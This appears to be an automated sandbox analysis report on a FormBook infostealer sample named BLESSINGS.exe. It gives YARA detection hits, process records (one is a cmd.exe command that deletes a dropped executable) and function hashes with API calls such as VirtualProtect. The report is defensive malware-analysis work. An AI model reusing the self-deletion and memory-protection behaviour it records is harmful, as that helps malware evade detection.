                                                                            MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:moderate

                                                                            Chronological Activities

                                                                            Analysis Process: cmd.exe PID: 6784 Parent PID: 6744

                                                                            General

                                                                            Start time:21:25:17
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
                                                                            Imagebase:0x2a0000
                                                                            File size:232960 bytes
                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Analysis Process: conhost.exe PID: 7012 Parent PID: 6784

                                                                            General

                                                                            Start time:21:25:18
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff61de10000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Disassembly

                                                                            Code Analysis

                                                                            Reset < >

                                                                              Analysis Process: BLESSINGS.exe PID: 4588 Parent PID: 5948 BLESSINGS.exeCOMMON

                                                                              Executed Functions

                                                                              Function 0117D752, Relevance: 4.7, Strings: 3, Instructions: 977COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ($<$ntin
                                                                              • API String ID: 0-2777557274
                                                                              • Opcode ID: 2ebc36496d0f4db59145c4817e7100993ba0fab69ff7cfe62c73289e0de8def8
                                                                              • Instruction ID: 912591c198bf3d1f2cbb6ba473a6439bb28f9113ef48c8309cb335b2bedb05b8
                                                                              • Opcode Fuzzy Hash: 2ebc36496d0f4db59145c4817e7100993ba0fab69ff7cfe62c73289e0de8def8
                                                                              • Instruction Fuzzy Hash: 8EA2A274E04219CFDB18CF99C981ADDBBF2BF89304F2581A9D508AB355D734AA81CF61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 054610F8, Relevance: 4.7, Strings: 3, Instructions: 969COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.429922225.0000000005460000.00000040.00000001.sdmp, Offset: 05450000, based on PE: true
                                                                              • Associated: 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ($<$ntin
                                                                              • API String ID: 0-2777557274
                                                                              • Opcode ID: 92f8eb4ca1d41fafab254c9516e2c4116085ccc6fb307c742dc047cf32eaf3ea
                                                                              • Instruction ID: f65f44b5017f42fa581d99bc49145bc0beeed36743faf2b432b595c8994ee571
                                                                              • Opcode Fuzzy Hash: 92f8eb4ca1d41fafab254c9516e2c4116085ccc6fb307c742dc047cf32eaf3ea
                                                                              • Instruction Fuzzy Hash: 87A2B274E042199FDB14CF99C981BDDFBB2BF89300F24D1AAD508AB255D734A982CF61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01179A69, Relevance: 3.1, Strings: 2, Instructions: 649COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: <$@
                                                                              • API String ID: 0-1426351568
                                                                              • Opcode ID: e3f700d9a7eebb6768d8225985d0f9c4284faaab7b253ec7dd2dd3d3f38060f6
                                                                              • Instruction ID: 8ffa9a5f7adc3d8dd8ef2226201db7cb4755e12d05b0fb203e17df106361610a
                                                                              • Opcode Fuzzy Hash: e3f700d9a7eebb6768d8225985d0f9c4284faaab7b253ec7dd2dd3d3f38060f6
                                                                              • Instruction Fuzzy Hash: 4C62AD74A00229CFDB68CFA9C984A9DFBF2BF48714F19C5A9D408AB311D734A985CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 054609C8, Relevance: 1.7, Strings: 1, Instructions: 482COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.429922225.0000000005460000.00000040.00000001.sdmp, Offset: 05450000, based on PE: true
                                                                              • Associated: 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: jN
                                                                              • API String ID: 0-1675516797
                                                                              • Opcode ID: 36b49c638ff4a3116e33934d9454d2d381b564c6761e6622b428bb5d9dcf1fcf
                                                                              • Instruction ID: 4395f6883d9a6bf313a839b83fe6a8ac13e1339d6f180629de728560b5741ff5
                                                                              • Opcode Fuzzy Hash: 36b49c638ff4a3116e33934d9454d2d381b564c6761e6622b428bb5d9dcf1fcf
                                                                              • Instruction Fuzzy Hash: EE32CF74A00219CFDB54DBA5C988ACEFBB2BF48715F55C5D6C408AB215CB30E985CFA2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01177750, Relevance: .9, Instructions: 897COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2c76325cec40f4e3838517c313cb475a701071891c4526c49284a29460fd9cc3
                                                                              • Instruction ID: 0f804e78f638e192c593d7008fe4e822f9aff26e9af7a543b43d63492b0f8929
                                                                              • Opcode Fuzzy Hash: 2c76325cec40f4e3838517c313cb475a701071891c4526c49284a29460fd9cc3
                                                                              • Instruction Fuzzy Hash: E7828174A00209CFCB1ACF68D898AAEBBF2FF49314F158969E5059B3A1D730ED51CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01174030, Relevance: .6, Instructions: 565COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d9a3f37c89ac08ccb14472a4620fbfae4a231df41aa0b16fc48cb2dc79c2de05
                                                                              • Instruction ID: eb988af77730e27f8ae84a0dc0b98c950caf14f1dd05a8c9eb2c4861e6f5cd90
                                                                              • Opcode Fuzzy Hash: d9a3f37c89ac08ccb14472a4620fbfae4a231df41aa0b16fc48cb2dc79c2de05
                                                                              • Instruction Fuzzy Hash: 0F228E70A00219CFCB29DF68C894AAEBBB6BF88304F158469E519DB791DB34DD41CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0117BC90, Relevance: .5, Instructions: 511COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f7bcb6d1d89eceb8fe23c62e29ac384ffc747c6ca26e4ba23848391b38b96a4f
                                                                              • Instruction ID: 597c2e5959ffd93e7ae2b482df9e6389fee4a3fa79ecf32b97624b377855c203
                                                                              • Opcode Fuzzy Hash: f7bcb6d1d89eceb8fe23c62e29ac384ffc747c6ca26e4ba23848391b38b96a4f
                                                                              • Instruction Fuzzy Hash: 9F42AC74E01229CFDB24CFA9D994B9DBBB2BF48310F5485A9E809A7355D730AE81CF50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0117A561, Relevance: .5, Instructions: 505COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6d77464e48935213e2129ac870b4129b1f6b43a75c03328a1803aca65d5367b1
                                                                              • Instruction ID: 510c82bec91100768479aae2b1e827b75d511f4ee4269c5cb5124b91984bc111
                                                                              • Opcode Fuzzy Hash: 6d77464e48935213e2129ac870b4129b1f6b43a75c03328a1803aca65d5367b1
                                                                              • Instruction Fuzzy Hash: 5032E174900219CFDB54DFA9C984A8EFBB2BF48715F59C5A9D408AB211DB30DD81CFA2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0117EEC2, Relevance: .5, Instructions: 453COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b3d7001e8e953ab079972c0f15330e775d5f1b81f448105bb14acd9be90ddea6
                                                                              • Instruction ID: ac7d6ab54c646939a16aefcaa54b2075123d15d24dd6fa5b6a7defa2b696c0f7
                                                                              • Opcode Fuzzy Hash: b3d7001e8e953ab079972c0f15330e775d5f1b81f448105bb14acd9be90ddea6
                                                                              • Instruction Fuzzy Hash: E122C274D01228CFDB69DF65D8A47ADBBB2FB49305F1088A9D40AA7391DB359E81CF10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01174798, Relevance: .4, Instructions: 352COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a3aa63ce4f7ec80b742bdaac30985879f0c67ea1f2f8bf293809bbc14a41986e
                                                                              • Instruction ID: 8c56f75b4e6cd57ce54627162328cad0534a9513b7e7f1b1310beda14912c75e
                                                                              • Opcode Fuzzy Hash: a3aa63ce4f7ec80b742bdaac30985879f0c67ea1f2f8bf293809bbc14a41986e
                                                                              • Instruction Fuzzy Hash: 90E16A34A00119CFDB19CFA8C984AADBBF6FF88314F158169E915AB761E730ED41CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0117F6C0, Relevance: .3, Instructions: 294COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0968aab49266397c911e3663bb5dcc1675b6cc616bcc4e0225ab58098f12a86a
                                                                              • Instruction ID: 4b3ffebf43b14effdf57c0bcc1d77f54de30db07d30b0c129dfe1b49113c9cb4
                                                                              • Opcode Fuzzy Hash: 0968aab49266397c911e3663bb5dcc1675b6cc616bcc4e0225ab58098f12a86a
                                                                              • Instruction Fuzzy Hash: D1D1C074E00218CFDB58DFA9C994BAEBBB2BF88304F1085AAD419A7355DB305E85CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0117F6B0, Relevance: .2, Instructions: 210COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7bb3acf5271747a3a40f68b40e43f60031d8e536ea1acbedafa65c4f2b4a5660
                                                                              • Instruction ID: 139ceb823137d1c3e19efc3fa127ab4b6efc19c6c2ae05a4fcef69ee6f14405d
                                                                              • Opcode Fuzzy Hash: 7bb3acf5271747a3a40f68b40e43f60031d8e536ea1acbedafa65c4f2b4a5660
                                                                              • Instruction Fuzzy Hash: 45A10074D00618CFDB58EFA9C994BADBBB2FF88304F1084AAD458A7355DB304A85CF11
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0117A459, Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0117A507
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              • Opcode ID: b5c16c1009aa999065c469744704fdae3306e99d425cd6ae930475073931f037
                                                                              • Instruction ID: f580a900b37f34486c099b95179e341c959dc3f055e9c6e5bc94482e644f15e7
                                                                              • Opcode Fuzzy Hash: b5c16c1009aa999065c469744704fdae3306e99d425cd6ae930475073931f037
                                                                              • Instruction Fuzzy Hash: FF3188B9D04258DFCB14CFAAE984ADEFBB0BB09310F14902AE824B7310D734A945CF65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0117E55A, Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0117E607
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              • Opcode ID: f1f08de421c442ae5857eb4c5163d757c2801f83e85c1cd1fb57cb157a64f1aa
                                                                              • Instruction ID: 497b1591f07008c0a58e044964d1e0e323aecdd33041fd6385acdc2fe98a1286
                                                                              • Opcode Fuzzy Hash: f1f08de421c442ae5857eb4c5163d757c2801f83e85c1cd1fb57cb157a64f1aa
                                                                              • Instruction Fuzzy Hash: DD31A8B9D052189FCB14CFA9E984ADEFBF5BB09310F14906AE824B7310D734A945CF64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0117E560, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0117E607
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              • Opcode ID: c43cb97ec96c561224b1a21fd283868d5d9632b6aca51865c173aedcfb0375f8
                                                                              • Instruction ID: b1db28590b980568beeb715455446ef93ef2cdacdd1ea63fafa126a7e230f4ce
                                                                              • Opcode Fuzzy Hash: c43cb97ec96c561224b1a21fd283868d5d9632b6aca51865c173aedcfb0375f8
                                                                              • Instruction Fuzzy Hash: D631A9B9D042189FCB14CFA9E884ADEFBF1BB09310F14906AE814B7310D734A945CF64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0117A460, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0117A507
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              • Opcode ID: 19b70b25ec6a3762a8069bb80316b2aee435cc28afa815b7bbc70448ff22e0fc
                                                                              • Instruction ID: fda2f466c7e86724356fe1dc04c2e066937f2bff308604467f8b5e1afa13bcb4
                                                                              • Opcode Fuzzy Hash: 19b70b25ec6a3762a8069bb80316b2aee435cc28afa815b7bbc70448ff22e0fc
                                                                              • Instruction Fuzzy Hash: 683199B9D042589FCB14CFA9E984ADEFBB0BF09310F14902AE814B7310D734A945CF65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0117AEC4, Relevance: 1.6, APIs: 1, Instructions: 86fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DeleteFileW.KERNELBASE(?), ref: 0117ECB9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID: DeleteFile
                                                                              • String ID:
                                                                              • API String ID: 4033686569-0
                                                                              • Opcode ID: 2a31a8a1496308da00da42b20552abb5a56c5fadfadba9732bb59f6c43024ae2
                                                                              • Instruction ID: 4ae507d299e286ee36bf3ec95bf85a2f21b661d8a98dd4006d676100f756208c
                                                                              • Opcode Fuzzy Hash: 2a31a8a1496308da00da42b20552abb5a56c5fadfadba9732bb59f6c43024ae2
                                                                              • Instruction Fuzzy Hash: BF31D9B4D05218DFCB14CFA9D984AEEFBF5AB48314F14846AE419B7310D334A945CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0117EC18, Relevance: 1.6, APIs: 1, Instructions: 85fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DeleteFileW.KERNELBASE(?), ref: 0117ECB9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID: DeleteFile
                                                                              • String ID:
                                                                              • API String ID: 4033686569-0
                                                                              • Opcode ID: 91b913e2656a3ceb8e0e4ef18926fdef3406bffadfc91f2ea21467e394df8094
                                                                              • Instruction ID: bb44ee0fba19abaf2d00ea26775cc127e90cd08ad710942ef3e710211fbdbd60
                                                                              • Opcode Fuzzy Hash: 91b913e2656a3ceb8e0e4ef18926fdef3406bffadfc91f2ea21467e394df8094
                                                                              • Instruction Fuzzy Hash: D931C9B4D012189FCB14CFA9E984AEEFBF1AB49314F14806AE419B7350D334AA46CF64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 05462090, Relevance: .1, Instructions: 122COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.429922225.0000000005460000.00000040.00000001.sdmp, Offset: 05450000, based on PE: true
                                                                              • Associated: 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f256f48f1ff8c73efe3ed70a0762af5ea2477254885d3f101fb38412e4fd19f5
                                                                              • Instruction ID: d90b44e2072ea9324e4078ba609724ea245750abe820bfbf78fec2a82ba5789f
                                                                              • Opcode Fuzzy Hash: f256f48f1ff8c73efe3ed70a0762af5ea2477254885d3f101fb38412e4fd19f5
                                                                              • Instruction Fuzzy Hash: 8851C378E00218DFCB14DFA5D8956AEFBB2FF88300F10842AE906A7364DB346945DF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 05463FB0, Relevance: .1, Instructions: 78COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.429922225.0000000005460000.00000040.00000001.sdmp, Offset: 05450000, based on PE: true
                                                                              • Associated: 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c6bcb9551e49d5a9a4a6d7e185e01ca4196dea3d2445325e83be2e69ebd7ad17
                                                                              • Instruction ID: 68ba88f9d7e30800b0a812b80fbb41aace8515d76542f0a8d1528691b4bdb257
                                                                              • Opcode Fuzzy Hash: c6bcb9551e49d5a9a4a6d7e185e01ca4196dea3d2445325e83be2e69ebd7ad17
                                                                              • Instruction Fuzzy Hash: 94312231A006099FCB00DFA8C844BDDBBF0BF49320F15815AE548BB2A0D774A989CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 054637A8, Relevance: .1, Instructions: 75COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.429922225.0000000005460000.00000040.00000001.sdmp, Offset: 05450000, based on PE: true
                                                                              • Associated: 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4615bfda358f267cabd2ffe5b47f83f41f5d200af76bc415b184e8f857f7a9f9
                                                                              • Instruction ID: 7bed476288699a28839525b889fd3bf4155a0252df1afe8b28dced0e30cc4eca
                                                                              • Opcode Fuzzy Hash: 4615bfda358f267cabd2ffe5b47f83f41f5d200af76bc415b184e8f857f7a9f9
                                                                              • Instruction Fuzzy Hash: E231D574D10299CFDB05DFA5D49A7EEBBB5BF48301F40842AE402A3390DB795948DFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00FFD6D8, Relevance: .1, Instructions: 75COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.421973911.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6e9ecf625cf91637eed83406b2b068e95fc2d5d3438821a032258368f924302d
                                                                              • Instruction ID: c15e5aeae496bc71a913b6d4eb0cc26aee2bd72fbc5258badba01c62243fbc60
                                                                              • Opcode Fuzzy Hash: 6e9ecf625cf91637eed83406b2b068e95fc2d5d3438821a032258368f924302d
                                                                              • Instruction Fuzzy Hash: 81212877504248DFCB14EF50D9C0B26BB66FF88324F2485A9EA054F266C336D846EBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00FFD7C4, Relevance: .1, Instructions: 75COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.421973911.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d417fcddacfc4e30c46dda2a28839e9633431834c8c0b001386b1e5c9a8833ca
                                                                              • Instruction ID: 2fd36cbfa122d8367a8a1443289baa35d36af9bf4901cd67a7a36615852cda58
                                                                              • Opcode Fuzzy Hash: d417fcddacfc4e30c46dda2a28839e9633431834c8c0b001386b1e5c9a8833ca
                                                                              • Instruction Fuzzy Hash: 2B2125B2904248DFCB15DF50D8C0B26BF66FF84364F2485A9EA054F256C336D846E7A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00FFD7BF, Relevance: .1, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.421973911.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 184b28d4c02099fc0a852538407da5dc7e76361d293f30cbc9c792e0a6473fb9
                                                                              • Instruction ID: a6f95a37b30b4bb52a37ef1be333355cad92f00106245cdc43603b32bb7b49ab
                                                                              • Opcode Fuzzy Hash: 184b28d4c02099fc0a852538407da5dc7e76361d293f30cbc9c792e0a6473fb9
                                                                              • Instruction Fuzzy Hash: B011B176804284DFCB15CF10D9C4B26BF72FF84324F28C6A9D9450B666C336D85ADBA2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00FFD6D3, Relevance: .1, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.421973911.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 184b28d4c02099fc0a852538407da5dc7e76361d293f30cbc9c792e0a6473fb9
                                                                              • Instruction ID: 8eb5f5464604478442dfc9ba6955a139aad6c492771afa8dbf03dd56b1d8b6c7
                                                                              • Opcode Fuzzy Hash: 184b28d4c02099fc0a852538407da5dc7e76361d293f30cbc9c792e0a6473fb9
                                                                              • Instruction Fuzzy Hash: 2611D676804244CFCB15DF14D5C4B26BF72FF94324F2486A9D9050F626C33AD856DB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 05462D50, Relevance: .0, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.429922225.0000000005460000.00000040.00000001.sdmp, Offset: 05450000, based on PE: true
                                                                              • Associated: 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cc52824fa739fce3116b97aac192db0522b64c339a98a9dd8bed87292604bc12
                                                                              • Instruction ID: 5bb4fbf36b2ebd00c9613cb006c50c65d79d93e8510e0a313b33232031bc1ca1
                                                                              • Opcode Fuzzy Hash: cc52824fa739fce3116b97aac192db0522b64c339a98a9dd8bed87292604bc12
                                                                              • Instruction Fuzzy Hash: 92111574D08208EFCB54DFA9C5457EEFBF5BB49300F20C4AAD804A2240D7B44A85DB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00FFD21D, Relevance: .0, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.421973911.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7e39fe9b8fadd34acd28cffed784824e9a47ac4a87328ad43e1b7b5baa1be9f3
                                                                              • Instruction ID: d70e547dad86fffbe1118cb0020a36724dcc8a89d64e45806cd9259d9e1d8a44
                                                                              • Opcode Fuzzy Hash: 7e39fe9b8fadd34acd28cffed784824e9a47ac4a87328ad43e1b7b5baa1be9f3
                                                                              • Instruction Fuzzy Hash: E301F272808348AAE7205F19DCC4BB6BB98EF42338F18815AFE145B256C778D844E6F1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 05460498, Relevance: .0, Instructions: 37COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.429922225.0000000005460000.00000040.00000001.sdmp, Offset: 05450000, based on PE: true
                                                                              • Associated: 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d555a8e6b37407b9a947be1bb4af7c1ce01c4ce9aebf642d62045edce865f3a7
                                                                              • Instruction ID: 40870934528bdab207a9cb109d178aac699ba54be00cab050f0dc8e4bf3bce1d
                                                                              • Opcode Fuzzy Hash: d555a8e6b37407b9a947be1bb4af7c1ce01c4ce9aebf642d62045edce865f3a7
                                                                              • Instruction Fuzzy Hash: 3A01E274D14259AFCB50DFA8C585AEEFFF5BB08300F6081AAE958E3341D7349A40DBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00FFD21C, Relevance: .0, Instructions: 36COMMON
